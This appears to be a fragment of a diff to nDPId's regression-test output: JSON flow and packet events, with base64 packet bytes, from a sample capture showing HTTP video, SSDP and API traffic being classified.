00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"}
01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}}
01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"}
01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}}
01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1470104382241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382241,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0YAAAERfELAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
@@ -251,26 +251,26 @@
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104385827,"flow_last_seen":1470104385827,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104385827,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1470104385827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104385827,"pkt":"\/\/\/\/\/\/\/\/rCILUFkxCABFAABEAABAAEARLlc7eNDa\/\/\/\/\/8PnB5sAMKByU3Uyb1ZTdDRBQUJIWlc1MGNtbGpaVjlCVUVOZlozVmxjM1FBYldVQQ=="}
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1470104387260,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104387260,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFFEAAAER7zPAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104388033,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104388033,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1470104388033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1470104388037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104388037,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0ZvMAAD0GYYbLQrZXwKhzCAG7wbw0Yee8K8BBp4AQAO2bugAAAQEFCivAQaYrwEGn"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104388033,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104388033,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1470104388033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104388033,"pkt":"TF4M6gNlABxCjnAxCABFAAApUkZAAIAG8z3AqHMIy0K2V8G8AbsrwEGmNGHnvFAQAQOsiQAAAA=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1470104388037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104388037,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0ZvMAAD0GYYbLQrZXwKhzCAG7wbw0Yee8K8BBp4AQAO2bugAAAQEFCivAQaYrwEGn"}
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1470104388182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104388182,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0wAAAERfDzAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1470104388182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104388182,"pkt":"AQBef\/\/6cPGh+Cr9CABFAAChfzUAAAERhGvAqAUJ7\/\/\/+ti8B2wAjcMVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104389597,"flow_last_seen":1470104389597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104389597,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1470104389597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104389597,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ErtAAEAGH+LAqAUQROn9hdFtAFBAFGHVDj7nf4AREAH2GQAAAQEIChoPOPTPHNz0"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390443,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104390443,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"}
00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104389597,"flow_last_seen":1470104389597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104389597,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1470104389597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104389597,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ErtAAEAGH+LAqAUQROn9hdFtAFBAFGHVDj7nf4AREAH2GQAAAQEIChoPOPTPHNz0"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390443,"flow_last_seen":1470104390443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104390443,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"}
